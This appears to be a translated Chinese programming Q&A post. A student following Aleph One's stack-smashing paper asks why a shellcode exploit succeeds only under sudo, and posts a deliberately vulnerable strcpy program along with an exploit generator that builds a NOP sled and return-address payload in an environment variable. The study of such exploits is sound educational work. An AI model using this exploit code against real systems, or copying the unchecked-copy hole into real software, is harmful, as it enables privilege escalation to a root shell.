我正在研究 Aleph One 的文章Smashing the Stack for Fun and Profit中描述的缓冲区溢出攻击。
正如文章中所建议的,我编写了一个程序 (shellcode.c),将恶意代码 (shellcode) 植入到环境变量 ($EGG) 中。之后 $EGG 作为参数传递给我希望攻击的程序 (vulnerable.c),导致该程序中的缓冲区溢出并导致 shellcode 的执行。
这就是缓冲区的样子——
[NNNNNNNN...NNNNNNSSSSSS...SSSSSSSRRRRR...RRRRRR]
其中 N 是 NOP 指令(参见NOP sled), S 是我的 shellcode, R 是地址(将地址返回到缓冲区中,这将导致指令指针从代码段跳转到上面的堆栈缓冲区并开始执行指令)。
当我以普通用户的身份运行 shellcode.c 和vulnerable.c 的可执行文件时,我面临以下问题 -当指令指针被重定向到缓冲区并遇到指令时,会导致分段错误。但是,在以 sudo 执行程序时,缓冲区中的指令执行没有任何问题,并且缓冲区中的后续 shellcode 成功执行,从而启动了根终端,从而完成了漏洞利用。谁能解释为什么会发生这种情况?
我禁用了以下保护 - Stack Smashing Protection、ASLR和Linux 的 NX(eXecute Disable Bit)。
我正在使用 gcc 4.4.3(目标:i486-linux-gnu)编译并在运行内核 2.6.32 的 Ubuntu 10.04(Lucid Lynx)上执行。
以下是我的两个程序:
易受攻击的.c
int main(int argc, char** argv) {
char buffer[512];
if(argc>1)
strcpy(buffer,argv[1]);
return (EXIT_SUCCESS);
}
外壳代码.c
int main(int argc,char** argv) {
char *buff, *ptr;
int *addr,retaddr;
int i;
int offset = DEFAULT_OFFSET;
int buffersize = DEFAULT_SIZE;
/* Set buffersize and predicted offset if arguments are supplied to the program
*/
if(argc>1)
buffersize = atoi(argv[1]);
if(argc>2)
offset = atoi(argv[2]);
if(!(buff=(char*)malloc(buffersize))) {
printf("Can't allocate memory!");
exit(1);
}
retaddr = getStackPointer() - offset;
printf("%d\n",strlen(shellcode));
printf("Using address: 0x%x\n",retaddr);
addr = (int *)buff;
for(i=0;i<buffersize;i+=4)
*(addr++) = retaddr;
for(i=0;i<buffersize/2;i++)
buff[i] = NOP;
ptr = buff + ((buffersize/2) - (strlen(shellcode)/2));
for(i=0;i<strlen(shellcode);i++)
*(ptr++) = shellcode[i];
buff[buffersize -1] = '\0';
memcpy(buff,"EGG=",4);
putenv(buff);
system("/bin/bash");
return (EXIT_SUCCESS);
}